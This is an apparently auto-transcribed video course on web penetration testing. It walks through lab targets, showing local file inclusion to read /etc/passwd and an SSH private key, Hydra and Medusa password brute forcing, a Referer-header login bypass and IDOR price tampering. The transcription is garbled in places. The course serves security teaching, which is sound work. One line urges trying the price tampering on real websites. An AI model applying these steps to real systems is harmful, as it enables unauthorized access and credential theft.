to a specified location, potentially by exposing a sensitive information or interacting with the service that should be accessible by the internet. Now, we would like to do the practical now here. So, SSF vulnerability are often exploited in bug bounty programs, and finding them can lead to a high impact discoveries, especially in cloud environments or applications that interact with an internal services. So I have posted here as SSRF attack. So this is my targeted IP address. So now let's see here. I came to my targeted IP address. This is this one. So where Apache 2 directly. So we would like to look the page source. So in the page source, we not yet identify any useful thing. So we just close this. Now I'll try to do here with as Govastra directory minus u HTTP and our target IP address 192.168.18.20. Then you just need to specify word list is dictionary.txt. So I specify my word list. I have one, this one. So just copy this one. Now we try to go to this directory lava lab. Where it's taking a too long time to load this lava lab. So let it load this site. Then I would like to utilize the Burp Suite. So let it open this Burp Suite. Meanwhile time. So where you can look here lava lamp ready to join the cyber phoenix trying your hard crack. So let it you leave it this on. So we have seen here the downside. We would like to look here where we have here as to send here as an contact.php as to send a message. So utilizing this one, we try to exploit. So let it load this. So it's still loading. So let it come this above. So then we try to exploit here. So you write here for as username So let it start this one first. So I just write username, uh, then alex.com. Subject is Industry Club. Done. Then we just type hello. Now let it load this. Then we try to get this. Then we try to send the message once Burp Suite is launched. So now we are waiting for this. Now we would like to intercept the request of HTTP post method. Then we try to do here. Now it was open. Now let me would like to go to an proxy tab. Now we just make it this interception is up. Now where we have made all these things, so you just click on the proxy, then click on the Burp Suite. Then you try to uh, send a message. So where you can see a lava lamp. Can you bypass me.php? So where I have wanted this one, then I try to uh, make this one a request as forward. Now where we can see here, can you bypass me.php? So let me try to forward this. So where we got to this a bypass. Now let me I try to sometime, so let it be here. We try to analyze here, so you just close this sometime, and this also is just off. Now we would like to analyze here, so we would like to inspect the elements first. So before going as inspect, I would like to try to go to an look a view page source. Once you look a view page source, you need to understand here. Come back. Lava lamp, can you bypass me? That's it. Nothing else here. We would like to look the uh, HTML source code here using with the inspect.element. So I try to open this, the last one. So there you can look here, form, post method, actions, lava lamp, can you bypass me, specify a number, but we cannot able to get a number. Where placeholder is integer, and we need to look this one. So come back here, go back, head, nothing, body, yes, this one, then this, this, then we would like to look there, we are near to that. Please specify a number, then for a specify a number, t body, where we not yet get here, but still. So we would like to look here as carefully. The script tag, there's nothing. Now this also is script tag. There's nothing. So I would like to specify here. So let me close this as script tag. Come back, close here. Now, where here you can look here the table opacity. So here have 0.01. So I would like to specify as 1:0. 1:0. That's it. Now I have got it here. Where to specify the number. Now let it close this. Now come back here. You just make it intersection is off. Now we try to go down again to the Burp Suite. Now enter as integer, number as 1. Then click on download the number. Where you have got it the can you bypass.me, download the number. File equal to 1 and read. So where you have got it here. Now we would like to send to a repeater. From the repeater, now we need to read the server files here. For that, to read the server files from one place to, I would like to utilize as local file inclusion uh, exploit here. So you just type here as etc password. Now try to send. Now we would like to look here in the downside. Oh, sorry, I noted enter here carefully. Password. I'm sorry for that. So we try to enter here. Now you can look here downside. So where we are reading in the uh, server side the data, where it have SH, DNS MAC and message bus, uh, LX3, everything. So where we would like to identify here are. So you can also go for while changing all those things. So if you also look here like a for at LX3, the username where they can get root access so far. So later further we would like to discuss about everything. So then how you would like to get again like a to read the forward one. So using the same of local file inclusion exploit. Now you just type here as home, then for, then you just type dot sh forward slash id underscore rsa. That's it. Now you try to send here. We try to look here. Where you can look here the SSH key you have successfully got it. Now you go to, if you want to go to a root privilege access, you just copy this SSH key, then you just type SSH minus I key name, then for enter of the targeted IP address, and you have successfully got into the SSRF vulnerability. So we have successfully detected this SSRF vulnerability. That's it. Now next we go for security misconfigurations. Hello guys. Now we are going to discussing about security misconfiguration vulnerability. So when security misconfiguration vulnerability will occur, security misconfiguration is common vulnerability where security settings or configurations of software, server or applications are implemented incorrectly, making them as susceptible to attack. This vulnerability arises when an application, a network or a system It's not properly secured during a setup, deployment or maintenance phase, leaving it open to an exploitation. So, causes of security misconfiguration. Default credentials. Using a default username and passwords that may cause the security misconfigurations. Ah, unnecessary features are enabled. Like leaving like unnecessary services like pages, APIs, other features enabled, which may introduce additional attack for vectors. Then excessive permissions. Assigning overlay permissions, roles, or privileges are granting them more access of the required. Incomplete patching or update. Failing to apply a security patches or updates in timely manner, leaving known vulnerabilities are exposed. Error messages on stack traces. Exposing a detailed error messages or stack traces that can provide attacker with sensitive information about the system. Open directory listing. Exposing a directory like uh, where www.html, that directory is its attacker can get crucial information to attack more. So we just we would like to go here as test.testphp.web.com. We would like to target this targeted website. Oh, sorry. Here I need to go with the one web. So here I would like to target this one. Now you can target here as in the sign up. There you can get it as test where you can get all those information. So let us start this box first. So leaving a debugging mode, an application with the debugging features enables may expose a sensitive information such as environment variables like the system path or database credentials, misconfigured web servers. A web servers like Apache or Nginx might be configured to allow a directory listings or lack of proper access control, allowing an attacker to expose a server files system. Like I would like to show you here. Now let I just open the terminal. Now you just go with as GoBuster directory. Then you get like this lava lamp as one directory. Now we would like to look here as uh, 18.20. Then you just paste this here. Then you can get some of the informations like you can look here of some directories like unprotected a cloud storages, misconfiguring a cloud service like Amazon S3 buckets, otherwise Google Cloud Storage, leaving a sensitive data exposed to the public. Then misconfigure a permissions like assigning an excessive file permissions like chmod 777, giving a read and write and execute a permission to all users, which could lead to a data tampering or privilege escalations that can they can modify to themselves or to utilize themselves, otherwise they're demanding for their own terms. Impacts for a security misconfigurations like you can look here where I have posted one targeted website of last website where I have identified here all those things of directories like a skill, sys response, image index.html and skill. Now we would like to look this, open this complaint proxy tab, make it as interception is up. Now we would like to try here with the test and test and test. Try for here where you can see a test and test. Now would you like to forward this request? You can click here a forward all. Now you can see here where user info which already have here. Now where here we not get a user info here. Now we would like to get here as an artist.php where you have got this artist.php. Now if you would like to uh, get more forward or where you got it here. So now we would like to get somewhat security misconfiguration. So where artist.php question mark artist.what. Now I try to send to this as a repeater from the repeater. Now here is artist.what. Now I try here artist.what. I try to here as send where I got HTTP response 200 is okay. Then you would like to look this a render. We would like to look here the page of artist.one where you can get the reality. So if you can forward this one, so where you can go to here, so click here where you got it here as artist.one.php. You can observe here also in the repeater waiting for the data. You can look here artist.one.php. So you can change here also as a website of security misconfiguration where you get here artist.2. So you can look here. This is a way, similar way. You can observe the website security misconfiguration and read the inside of the data also. That's it. So now next we would like to look for a uh, directory browsing, otherwise brute forcing.
So guys, now we have previously we have discussed the cross-site scripting, server-side request forgery, and security misconfiguration. Now we are going to discussing about directory browsing and brute forcing. So directory brute forcing is a technique used to discover hidden directories or files on web servers by systematically guessing the URL based on common directory names. Like if you go to like Facebook, then if you go for forward slash like about, you can read the that type of directories from there. So we need to identify the directory names. This is often done using a tools that automate the process by checking a large word list of potential directory names. Some common tools we would like to use like a Google. Then we would like to use also like a directory buster, then directory search. So this two is enough. Also, we would like to look the a fast web browser. This was written in the Go language. This is also a good one. We can also analyze. That's it. Now we would like to test this. So we would like to come back here. Let me just make it as now. I have posted this. This is my targeted VMware. So this is my targeted website where I have entered the nano ETCM posters. So I was entered here as wordy. Then use Control O, Control X. Now just exit from here. Now first you want to target this one. So first like to copy this one. Now we would like to try with our directory buster. Let you just paste it here. So I think you are be visible. Yes, you are be visible now. Already. Now let you can look here. What else you can get it here? So where you got index.php, server status, WP admin, WP content, WP inputs. So where you get all the directories using with a directory buster. Now let me. I would like to utilize the another one. So you want to get the main list like with the PHPs, otherwise an extension. So you just need to paste here, like you need to get like PHP with the TXT, comma with HTML, like this. You need to specify here. So where you can analyze all those things here. So what else inside there? So uh, we would like to look here. So where we have identified before license.txt, now we would like to look here readme.html, where you not yet read from the targeted website. Where you can look here wp block.header.php, cron.php. We would like to open this link. So let me I just ask this one very big. So where previously we have identified here this, so it was opening in another targeted page. So it was opening in the Chrome. So this is not a workable. So I don't want to open the Chrome. So I would like to utilize only the Firefox. So just better to copy, come back here, then paste it here. Then you would like to look here where you not get anything else. Then we just try here as WP admin, where you got it here all those things WP admin. So this is where you can identify using with the directory buster. Now let me go through with the GoBuster. We just use the GoBuster. So if you know how, we just need to type yes. Then we would like to install the first GoBuster. So now we have a GoBuster. Now just type clear. So just type here as GoBuster minus minus head, where you identify here. Now just type here. Just type here GoBuster directory minus u for URL. You need to paste the targeted URL. So you just need to specify only the word. Once this is done, now what is your next? You need to specify the word list. Word list is here. You have get almost all word list, user share word list, directory buster, then directory list medium. So we need to identify from here. So let me I identify from here from the next tab. So let me I just type here as first this. Let me make it as a big directory list 2.3. So where we have pasted. So there here also we'll identify here. You can look here. Everything will be identified. Where you get like 304, where you can redirect to here. So you can go to this directory. So WP includes WP content. So this you can do here. Now also if you want to utilize here any type of targeted word list, let me show you here. This is in directory buster. You can utilize for enumeration one, enumeration two, this. Then directories for pushing this one, directory list this one. Then directory list for lower cases, directory list for lower cases with the small. That's also great. Now once you come back here, now just type this here. Now you can get here like AMAS, then directory buster, then directory buster, DNS map, fast track, this is for and Wi-Fi, this is for journalist. So you can also use as here like a gun chip, then you can paste this rocky.txt. So this is for a password for cracking. So not for anything else. Let's you enter your password, then just enter, just copy and paste it. So rocky.txt is only for password cracking. This also for website fuzzing, then where Wi-Fi. So where this is get. So nmap list or then this is Wi-Fi.txt. So let me would like to show you. So I just type here as exit list. Just right clear a list. So word count list Wi-Fi.txt. So where you have 203,808 word list in the Wi-Fi. So this is for Wi-Fi cracking. So where you have got all the word list. So even when you go with the directory buster, it's the same list. When you come with the go buster, it's the same list. Now we would like to utilize the I would like to get the directory search from the GitHub. So get back here. So I just type here as directory search GitHub. Let me get this directory search web path scanner. So this is also the same way you can get it, but this little bit directory search.python minus u target for extensions and options. So let me just copy this one, come back here. Now just type as git log and paste this repository where you get the directory was search. Now we go to as a directory search. Now just type list. So you just type here as pip3 install minus r requirements.txt. So once we install the requirements, then we need to install the setup.python. So however you go, this is the same way process. There is nothing else changed. Yeah. So you just type C, you just type here clear. Now, if you want to use as perf minus u for the target HTTP wording, then you would like to use here as push. Word list is user share word list directory buster directory list 2.3 medium.txt. That's it. So here also the same way where it will be get all the thing here. So where you get here, you can look here WP includes WP admin. The same way you can get the same result. Now where it was done, I just type here. So let me try with the Python 3 directory search.python. So where I have got this as directory search help. So where it was installed, now just type clear directory search minus u for URL HTTP, enter as word. That's it. Where it will generate the automatic word list here. Let me like to look here. So it will automatically have some word list. It will be generated automatically. So I forget to tell you, you need to also download the checklist that have a lot of directory listing of things. So where you can go a lot of things to do from there. Now our task is server status. So that's it here. Nothing else. So where you can look here where you got all the information as similar way. So these tools and worklists will help you to identify the hidden directories and files and resources that may not be publicly listed or potentially revealing a sensitive data for vulnerabilities. Now, we just go for CMS vulnerability scanning. So let me go here. So we are going for CMS vulnerability scanning. So what is CMS vulnerability scanning? Let me like come back here. So CMS vulnerability scanning involves for checking a content management system like WordPress, Joomla, Drupal, or known vulnerabilities. These are several tools designed to automate this process, searching for a common misconfigurations, outdated plugins, or other weakness. Like we are going to do here like as a WP scan. So first we would like to try here as so just type clear. Now let me I just try with as WP scan as minus minus URL HTTP enter as a wording. That's it. So I just wrongly I specified. So just type here as wording. Enumerate users and plugins. So I need to enumerate the users and plugins. You just type no. So where inside the WordPress it will enumerate these things. You can see here. So where it was identified here, like look here, we have got somewhat information. Admin, Mark, Graph, Sarah, Jets, everything. So we also utilize like all like a let me show you here. So we have utilized here as nmap script. WordPress theme is 2017. The upload directory listing is enabled. Wording WP content uploads where we have got here. That's it. Now we just type here as clear. So you can identify using with as micto minus h HTTP word also. This is also a best scanner. So if you want to try a multiple things, I have already made as a Drupal, then Joomla, then some other CMS websites also that I can pin you in the description box. So you can look at that CMS also. How to exploit, how to find the version, everything. So for that, you would like to utilize the uh, such exploit using the exploit database. Now, let me. This is still almost all done. Where you have identified here. So let's see here. So where you have identified here in the web server running a valid response HTTP junk method. So WP links where you have identified license.txt, WP login.php, where to register. So WP content, WP login.php. So where we have identified here also. So even you can use the NISAs for identifying the CMS vulnerabilities. Check outdated plugins, themes, and everything. NISAs is best, OpenWAS is best. Then Akinetics is also a best for CMS vulnerability scan. Then uh, I would like to also show you a simple way. It's not even coming. So once you come back here, so you just type clear. So for nmap using, so we just type here as nmap minus script. I would like to get as HTTP as a WordPress so I would like to get the WordPress enumeration. Then you just type as HTTP, then wording. That's it. Oh, sorry, here I just HTTP. So why it's not come? So let me try here equal to script equal to. So unable to split a net map. So using nmap also you can identify script HTTP WordPress. So let's see here. It's not yet. So this is not yet. So you just leave it here. So now we go for next as network scanning. So the next task is a network scanning. So once you come back. So network scanning is the process of discovering and mapping the devices and services in the network. It's commonly used by administrators to audit the network security and by attackers. For reconnaissance, the goal is to gather information about active hosts, open ports, service running on those ports, and potential vulnerabilities. So, commonly, we would like to use as a nmap minus sn enter. We would like to enter our targeted IP address 192.168.18.0 by 824. Let we would like to enumerate here where we have identified all these ports which was available. So scan report as wordy where we have gotten this. So this many ports is available here. So I would like to get as uh, for a specific host. So you just type here as nmap port as 126655535. Then enter your targeted IP address 192.168.18.22. Let you can look here the nmap port results. So it may take a time to get. So where you have got only a two ports is available, one is 22, another one is 80. That's great. Now we want to know the service version of the nmap of our targeted thing. So we just type minus sv, enter your targeted IP address 192.168.18.22, where you get the version. Or let's wait here. So service detection performed, please report any incorrect. That's it. Service info, it was Linux CPA Linux kernel where you have got it here. Then we want to identify which type of OS that one. So just type here as nmap minus SO enter your targeted IP address 1.6.18.22. So which requires a root privilege. So you just type as su. We just copy, paste it. So where we can get identify here the OS detection. Then if you want to identify as uh, this one, now we got all those things, so just type clear here. I just come back here, so just type here. So you just type sudo su, enter your password. So you want to get entire of the list of your targeted IP address. So I just use -a, enter your targeted IP address, where you get in detail of the open ports and everything here. Let we would like to look here. So it may take a little bit time to come. So where we would like to look here. So here you got in detail for one is SSH, where the SSH hotkeys and RSA, ECDSA, ED 25519, then 80 where you got in the Apache HTTPD, where it is in the WordPress version 5.1.1, HTTP header with Apache 2.4.25, it was in the Debian, and where the MAC address is the VMware. So HTTP title is word. So just another WordPress website. That's it. Now we would like to do this. Now where the OS detection is still not coming, so it also done. Now using also you can use as if you want to utilize as a mask scan, that also a possible. Let me show you as a mask scan. So you just use as mask scan. You need to specify port 1 is 65535, enter your targeted IP address 192.168.0 by 824. That's great. I would like to specify rate equal to 1000. So where it will do the uh, gathering, where is the open ports is available to capture here. So that will check from 1 to 65535 ports. So where OS detection will be done here. So 186 is closed protocol, protocol is unreachable, 67 open filter and no response. So one is open with ICMP, another one is available with TCP, another one is available with UDP, where we have identified here. So this may will take a longer time. You can look here, 4 hours need to wait, almost or 5 hours. So we can't able to wait here, wasting much time using with the mask scan. So it's a high-speed scanning for large networks, not as detailed as Nmap, but great for finding open ports very quickly. But it's take a long time because of your internet capacity as well as the performing of GPU. So Even you can also use as a GenMap as well as Angry IP scanner. That will be a best for uh, network scanning, and OpenWAS is also best there. Let me, I try to go with as, so you just type clear, you just type here as exit. So I would like to utilize as a netcat. Netcat is a vertical tool that can be used for network scanning, but its main strength lies its ability to act as a backdoor, as a simple port scanner. So you just type as netcat minus ZV. So just enter the targeted IP address 192.168.18.22. I would like to specify the port is 121024. Let we would like to try here. It was open here. Instant results this and all. So you can see here this is in Wordy. Port is 80 and 22 port is open. Where we have got this. So this will take a long time. So next we are going to discuss about auth bypass.
Hello guys, welcome back to Pentesters Club. Today we're going to solve another CTF challenge named called Hack Asset Reloaded. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network scanning, port knocking, abusing HTTP web service in the Burp Suite, SQL injections, and SSH brute force with a Hydra, and access the TT shell, then kernel privilege escalation. That's it. So first, open the terminal. So you just type sudo su, enter your password, then you just type netdiscord -i is 0. So first we would like to identify our target machine. Let's see here. So here I identify my target machine. So I just quit now. I just type nmap -34 -a is an aggressive scan and enter your targeted IP address. So now let's wait for the nmap result. So I have got the nmap result, only one is available with the 22. So I would like to run again with the specifying as port. So this will take somewhat time. Let me just specify as port. Now let's see here the port. So where we have the SSH. So I would like to try as SSH, enter your targeted IP address 192.168.18.130. You just add S. So there is available 321. So we just quit now. We just type knock, enter your targeted IP address 192.168.18.130. 3, 2, 1. That was done. So even you try to connect by this like netcat, enter your target IP address 18.130 by 3. So connection is refused. Here also refused. Here also refused. So why it will be refused to get connected? So there is another port we would like to see here, 33447. So let's directly walk to that targeted port. So you just enter the targeted port. So 192.168.18.30 to 133. Oh, sorry, we would like to look here one more time. 33447. 33447. So it's just like a brain. So we just need to use it this one. So just look first IP source There is nothing else to utilize this one. So I would like to go with the direct layer first with the directory buster. Just copy this one, come back here. So we would like to go with the directory buster. Let's see here. Then open new tab. I would like to go with as a nicto minus h, then paste it. So there is available one as direct as bin. So you just copy this one. We would like to look here as a bin. So here I was got it here as in the bin. Now we would like to look the pesos here. So where you can look here, this includes a validation. So I would like to open this one in the new pesos. So I just remove this. So where there was a problem, could not process to a login. So I got here until like error.php. We need to log in that one. So let it be that one. So now let we would like to look here is for the there is something from here as crack. We would like to look here. What is this crack? This one at all. Then index.php, JS, CSS. So I would like to get, so I just quit here. So let me I just quit here. Uh, we would like to go with a bit, then forward slash. So I just specify. I would like to get only with a PHP. Then let's see here what else we can get it from here as PHP files. Where we have got this as includes a validation.php. So we just open this one in the new tab. Then I just quit this, including this. Now let me would like to look here where I got here as dashboard.php. So just copy this one. Then we would like to look here. So you are not authorized to access this page. Please log in. So we are going to bypass this targeted website. So just open this here. Now we just type as Burp Suite. So let me, I would like to stop all this here. Now, let's see here, that's it. So we have as error on index.php. Now let me like to look from here, both. So we have got it here. So come to an proxy tab. Now we just intercept this up. Now let what we would like to do here is we just so this on. Now I just refresh this one. So where I have got it here all. Uh, Now if I would like to add here as a dashboard.php, so I would like to add here as a referrer. So we would like to add here as a referrer. So even you can send this one to an repeater. That's why. Now where you send a repeater, you just try to send here. Then you can look here. What else we can get it here? So it's take a long time. Let me see. So you're not authorized to access this page. So this will take to present here. So now where we would like to add as a referrer, we would like to look. So we can't able to add here as a referrer. Okay. The so where here is not available to add any as a referrer here. So where this was went, we cannot find here. That's pretty. So let me, I just come back to a proxy. Then we would like to look here. Yes, here it's available to add a referrer. So let me, I just add as a, so we just type here as a referrer. Referrer. Then I would like to add the value. So the value is from here. So where we got it here is, come back here. So includes dot validation dot php. So uh, where is this source? So entirely just copy this one, copy, come back here in the value place, paste it. Then also you just need to copy this one as includes validation.php. So just copy, come back here, paste it. Includes validation.php. So I add the referrer. Then now I would like to make a forward this one. Let it forward. Uh, Now you can look here, that was accepted application. This was done. Now let me, we would like to look this. Congratulations, you have bypassed the login panel. So come on, bang on head here. So we would like to click here. So I just make this disable now.
So guys, now we are going to discussing about web app enumeration. Web application enumeration is a critical step in penetration testing and bug bounty hunting. It involves for identifying all potential attacks, surfaces, components, and functionalities of the target web applications. So, how we would like to identify here? Like, if you go for a subdomain enumeration, like we would like to use a sublister, AMAS, asset finder, and subfinder. Go for SSL certificate, like we would like to use for a crt.sh, that's also good. And we also use then DNS dumper also. For directory and file enumeration, so we already discussed about directory file listing like directory buster, go buster, directory search, and everything. Then for parameter discovery, so to get like a get or post parameter using like Burp Suite and spider or everything. Then otherwise we would like to use a parameter spider also. Then the advanced one is actionable. That's useful for finding a hidden parameter. Then once you look like a technologies for stack for identification like Webalizer built with what web. Then virtual host discovery like a FOOF, then virtual host scam, Bubsuit host, header attack, that's also good. Then both scanning we already did Nmap and mask scan. Then API enumeration, different response like the status code, page content, during login attempts or password resets, everything. That also we can look. JavaScript file analysis like link finder with the Bob suite. Manually, we would like to inspect using a browser developed tools. Then session and cookie enumeration, like we would like to use for this. The main thing is a Bob suite. That's better. Look for a missing HTTP only, secure or improper domain attribute, and content discovery tools like a webpack URL. That's a great. Now we would like to do this web app enumeration. Now we would like to come back to here. Now this is our targeted website. Now let's come back here. For enumeration, I would like to use. Let me open the terminal here. I just make it as now. This is in WordPress, so I just use wp-scan minus minus URL. You specify the HTTP, wordy, then enumerate the users and plugins. So where we are going to enumerate from here users and plugins. So you just type no. So if it go for update, you're never gonna get a results at the right time. Now you can look here headers where we got it here XML and RPC. Then WordPress a readme.found. There we have found it here WordPress theme 2017. Then enumerating the most popular plugins. Also here where it was found username is admin, password is Jens, another one is Grab, Mark, and Sarah. So where we have identified the all users. So WP scan is totally quite easy. And once you go with the Joomla and Drupal, it's directly you get the privilege escalation of this one. So that's the exploits will be available in the MSF console. Now you just note down here, you just write here as hostpath user.txt. So let me make it this one very small. One is with admin, another one is Jens, then another one is Rahab, another one is Mark, another one is Sarah. That's it. We just click on save. Once you have saved this, now just once you just type here as cat user.txt, user.txt, password as password.txt. That's it. Now it will go for uh, enumerating here. Now let it see here. So where a valid password combination is found, you can see a valid combination is found. Username is Mark and password is help desk. That's it. It's a simple way to identify here. That's it. Now, to look here as a web technologies, which was used also. If you want to look that as I would like to show you here as we would like to open new tab. Now, we just type here as uh, what web HTTP, enter the word that you can identify here everything clearly. Now you can look here wordy 200 is okay. It was posted in the Apache server 2.4.25. Country reserved ZZ. It's not presented. HTML HTTP server, it is in the Debian Linux. Apache 2.4.25, it's in the Debian. The IP address where I have hosted in the virtually, that IP address is presented. They have a Java query which is present of the version. Then meta generator WordPress version is 5.1.1. That also we would like to show you here. Powered by a WordPress script with the text or JavaScript, title with the wording, just another WordPress website, common header, a link, WordPress 5.1.1. Now let it scroll down here. WordPress version here 5.1.1, which is identified for insecure, released on 2019 3:30, where we have identified here. Now we already know that directory buster where we got the admin WP admin. So where we have identified and cracked the passwords is one is with the mark. So just copy the mark, paste it. Another one is help desk. Just copy, paste it here. So where you can look here the WordPress version. That's it here. WordPress version is 5.1.1 running, where we have successfully cracked. This is how you can do the uh, web app enumeration and crack it. That's it. Now later we would like to discuss about dictionary attack. So guys, now we are discussing about a dictionary attack. So what is a dictionary attack? So a dictionary attack is a method used in hacking and penetration testing to crack the password or encryption by systematically trying all words in a predefined list of possible passwords. This list can contain a commonly used password variations or passes that users are likely to choose. Here are we would like to look here like word list, like we would like to use the most word list is like, let me show you here the word list where the most word list we would like to use the rock.txt. You just here cd user share word list, you just type plus minus here. So you can look here as a word list. Where is this? A rock.txt. where you can look here, have almost all 13 million, uh, I mean 1 billion passwords. So just look here, word count list, rockq.txt. You can look here, almost 14 million passwords where we have here. So this will take a long lengthy time process to crack all those things. Then if you want to get, I would like to present another one is here is available as a checklist, GitHub, where you can get it the entire of the checklist, where you can get here. Let it go here. Like you can look here for discovery, miscellaneous, passwords, usernames, web shells, everything. You can get it from here. You can look here for a passwords. Now, you can look here as a Bible password, books, common credentials, cracked hashes, default credentials, honeypot captures. There is a multiple things which have the passwords, which is already as an inbuilt and default and some other gathered from the everywhere. So you can download this as checklist and utilize here. Like we need to know what is the difference between brute force versus dictionary attack. So brute force tries all possible combination of characters, which can be a time consuming for complex passwords. Then dictionary attacks. It tries a words from a list, which is faster but limited to the quality of a word list. But with a, when you go for a dictionary attack, you can't able to gather what you want or what the right password is. When you go for brute force, it will try entirely for the combination and characters can time consume, but you can gather the password. In dictionary attacks, sometimes maybe you can get the right combination, sometimes you cannot get. So for gathering a word list, let me show you here. So just come back here. Like let for gathering a word list, we would like to use a civil. Then you just present as your targeted WordPress as wordy, then output as dictionary.txt, where you get the word list. So here civil minus here. So where you can get it here all. So depth 5, then minimum word length and maximum word length. So let me, I just put as minus depth 5, minimum word length is 8. Then you specify for HTTP wordy. Then we would like to utilize here as output as dictionary.txt. Let we would like to, so where we put the URL also missing the URL argument. Okay. Okay, so this you can get here some of the word list. Now let we try here. So we just type here as clear. Now once we clear this, now you can also use as a crutch. It also generate a word list. So for this you just type here as crutch. Minimum is 4, maximum is 8. Then you specify the domain. HTTP wordy. Let's see here where you got it here. You look here all the possible word list. It will take a long lengthy time process to generate here as this crutch. Now let's look here. So I want to quit here this one. That was clear. So you want to utilize here as for a targeted thing as any one of the username. That's it. Like as a mark, output as dictionary.txt. Where you got it here with the mark, you can look here. We just look here as word count list dictionary.txt. You can also look here as a mousepad dictionary.txt, where you got here with which was write all possible ways. So that's it here. So you just close here. So I don't want this dictionary.txt, so just write here. So where we have done this. Now we try to crack for SH and web login forms, WPA2, WPA2, WPA and WPA2 and protected Wi-Fi networks also. But we try with the first to crack a password. We just use as Hydra. I would like to crack my event machine. This machine. Now let me come back here. So you know the username as TCPL. Then specify the password list as password.txt. Ah, you just specify for as such enter your targeted IP address 192.68.18.72. Let's see here where which was a crack the password successfully. So it's simple way to crack the passwords. Now you can also use as like a Medusa. Medusa is also a popular for cracking the passwords for a large scale attacks. So you need to specify minus host enter for HTTP enter 192 dot. So I need to specify for as 192.168.18.72. Then let me present with the HTTP only, does not matter. HTTP. Then we would like to go for as uh, username as TCPL. Then let me I specify for password.txt. Then we need to specify minus m for sh unable to resolve name or unknown. Let's see here now. So where we have cracked the password is successful here. Now once you have seen here account check post with the sh one-to-one complete password for one is help desk, another one is for Alex. So where we have successfully cracked here. Now but hashes. So if you have and hash files that you can do also, but hashes also you can try like to cracking the hashes. Now let me try with as a WordPress one. So let me I already have here as a WordPress. We don't know the username and password. Now let me I just try here as username as a test, then password is test. Now where you got it here as everything as wrong way. Now let me come back here. So I would like to utilize as Hydra minus L user.txt. Password is password.txt. Then you need to specify as HTTP enter your targeted uh, domain as wording. Now this is a HTTP post form. We just type here HTTP post form. Then uh, from here we need to identify here as wp login.php, this one. So just copy, come back and paste it. Then we need to identify here, go back here. So inspect the elements, in the network, and I just try as, so let me try here as admin, uh, admin, try to log in here. So where we have got this, not it, identify here 404 not found. Where I have got this here as a post form. Now here it's in HTTP header. Now we go for a request. Here also nothing else we have got it here. So I would like to add here as let me come back here. So let me, I just add here as briefly as here log equal to, so I just specify as in the user, then we did close and specify as pwd for password to find, so sorry, I just need to specify for password equal to, then you just specify as pass. So let me come back here, there is this pass. Then where we would like to go here as wp submit equal to, wp submit equal to a login. Log plus in and redirect to HTTP what is game redirect to, so this is the one you just need to copy from here. So better we would like to take here as the uh, entirely we just copy this raw one. Let me try here, let it paste here. Yes, that's great. Now I just got entirely of the raw thing, so you just come back here. So where you just paste it here, cookie equal to 1, then you just enter as the password, you enter the, so where The password you enter the username, that's it. So from here just need to go. So just copy this one. So let it paste it here. Then let it close here. So I just need to modify something here as come back here. Log. Now we need to enter here as log equal to as, let me go with the admin for this. Password is admin. Now let we try here to crack this password. The password you enter from the username. Let's see here. www.example.com. Okay. So where we try here as, I try here with 192.168.18.22. So it need to start with the HTTPS. So let me try again with the HTTPS. So let me try here HTTP. The option module parameter, example.com option module, WP login. It's not work out. Invalid target. So let me try here again. So in this case, if this is not work out, we try with the introducer. So let me try with the Burp Suite. So sometimes it may be a workout, sometimes it may be not workout. So let's start with the Burp Suite. Then we just click on OK here. So in this case, it's not solved here anything. Then let we try here as, so let us start here. Click on Burp. Now we try here, but we not it work out here. So let it start this Burp Suite. Then I would like to switch to an admin. So where a Burp Suite is started, click on a proxy. Click on here the proxy. Interception is up. Now you just type here as mark, then password is as test. Where you have got this one, so you just set to introducer, intruder. Now where you need to get here as, we just need to add here, here. Then you need to set a payloads, load the targets. Where is this password.txt? Where you have loaded, then click on start for attack. Then click on OK here. Now where you have got it here, now you can analyze here the right one. So you can look here, the first one where a request submit login to redirect to WP admin. So where this is done, where you can look here as raw hexadecimal. Now, where you can look here, where you got it as 302 power, where you got X frame, and where you have identified here. So path, WP content, and plugins, HTTP only, HTTP only. So where you have successfully logged in here. So you know have render here have render, but it's not going to look it out here as this render. That's it. So this is how you can crack the password. That's it. So later we would like to discuss about insecure direct object reference prevention.
Has been placed fourth of the list of OWASP top 10 web application security risks since 2013. It allows an authorized user to obtain information from the user and could be established any type of web applications. Basically, it allows a request to be made to a specific objects through the pages or services without the paper verification of requesters right to the content. Okay, so now we will look it out how this will be get it done. So currently I would like to use the uh, IDOR like in the buggy web applications. So I would like to use insecure IDOR change secret. So you need to get it from here. Insecure IDOR change secret. So then click on yes. So once this is done, so you need to set up a proxy manually. Click on settings. Then you need to click on manual proxy. Then click on OK. And here, once you come here, you just click on intercept on. Then come to a web browser. Then click on Burp Suite. So now you need to enter a keyword like a new secret. So you can enter any type of secret here like hello, then it will give you hello. So and the secret is hello and login as B. So we just change B as your targeted destination, like you can give as your own name or something else, then click on forward. Then you can see the secret has been changed. So now let's change. Now we successfully changed this one. So now we will do a in any official website in the attackers to replace the user account from admin account. So now we would like to change insecure IDOR like a price tampering. Okay, so we just see what is this. Come back. Yeah, order tickets. So in many type of websites. Okay, so here, so this I need to give here forward. So I just off. So now we will get here insecure order like a price tampering. Like I would like to purchase one movie theater ticket. It's cost me a 15 euros. Okay, so I would like to purchase like a 15 tickets. Okay, with the price of $1. So how that will be done? So we will look it out now. So now open the Burp Suite, then intercept is on. Now just click on confirm. Now here ticket quantity is 15 and price is 15. So I would like to uh, reduce the price. Quantity is 15 and I would like to put $2, okay, price. So then I can click on forward. Now come back. Now I can see your order 15 movie tickets and total amount charged from your account automatically 30 euros. Thank you for your order. So you need to do it in the real time of websites like this. So this is the basic tutorial of. So guys, now we are discussing about broken access control. So what is this? A broken access control. Broken access control is a common web application security vulnerability where users can gain unauthorized access to a resource or functions. This flaw occurs when an application does not properly enforce user permissions or fails to restrict the access on certain actions or data, leading to a potential data breaches and privilege escalation or exposure of sensitive information like IDOR vulnerability, which was discussed before. When an application predictable or guessable URL or parameter to access the resource like a user name or XYZ things, attacker may manipulate these values and access the data directly. One, failure to redirect, restrict the URL access. Applications might expose a sensitive URL without a proper check or URL user's permissions. For example, a user might able to access an admin dashboard to perform an actions meant for admins by simply navigating the admin URL or missing the functions control, even though URL elements like buttons or menus may not be a displayed or unauthorized users or a backend logic might still allow those actions to access directly via crafted requests. And it will get a privilege escalation if an application fails to enforce a role restriction. A lower privileged user might perform actions are reserved for higher privileged users. Now we would like to look this. Now this is my privilege escalation to get it this. So to look this here. Now we have this one here. Uh, now let me. I just interception is off. Now let me make it this one. Open the Burp Suite. Now let me try to recall back here. So there I try to everything we would like to send to this one as repeater. Okay, that's great. 